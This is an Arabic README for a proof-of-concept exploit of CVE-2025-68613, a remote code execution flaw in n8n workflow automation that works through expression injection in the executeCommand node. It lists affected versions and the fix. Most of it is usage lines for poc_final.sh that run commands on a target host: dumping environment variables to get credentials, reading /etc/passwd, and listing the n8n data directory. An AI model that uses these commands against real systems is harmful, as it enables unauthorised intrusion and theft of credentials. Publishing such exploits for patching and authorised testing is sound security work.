
إثبات مفهوم لاستغلال CVE-2025-68613، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة في أتمتة سير العمل n8n عبر حقن التعبيرات في عقدة executeCommand.
| الحقل | التفاصيل |
|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9 (حرجة) |
| الإصدارات المتأثرة | >= 0.211.0 < 1.120.4 |
| المصادقة المطلوبة | نعم (أي مستخدم لديه صلاحيات إنشاء سير العمل) |
| تم الاختبار على | n8n 1.119.1 |
| تم الإصلاح في | 1.120.4, 1.121.1, 1.122.0 |
يقوم n8n بتقييم معلمات عقد سير العمل على جانب الخادم. تقوم العقدة executeCommand بتشغيل أوامر shell مباشرة على المضيف بصلاحيات عملية n8n. يمكن لأي مستخدم مصادق عليه لديه صلاحيات إنشاء أو تحرير سير العمل استغلال هذا لتحقيق RCE كاملة.
bash poc_final.sh <target> <email> <password> <command>
أمثلة:
# Basic RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
# Read environment variables (may contain credentials/API keys)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
# Read sensitive files
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
# List n8n data directory
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'
ملاحظة: إذا كانت كلمة مرورك تحتوي على أحرف خاصة مثل
!، استخدم علامات الاقتباس المفردة.
قم بالترقية إلى n8n >= 1.120.4 فورًا.
إذا لم تكن الترقية ممكنة فورًا:
هذه الأداة مقدمة لأغراض تعليمية واختبار أمني مصرح به فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام.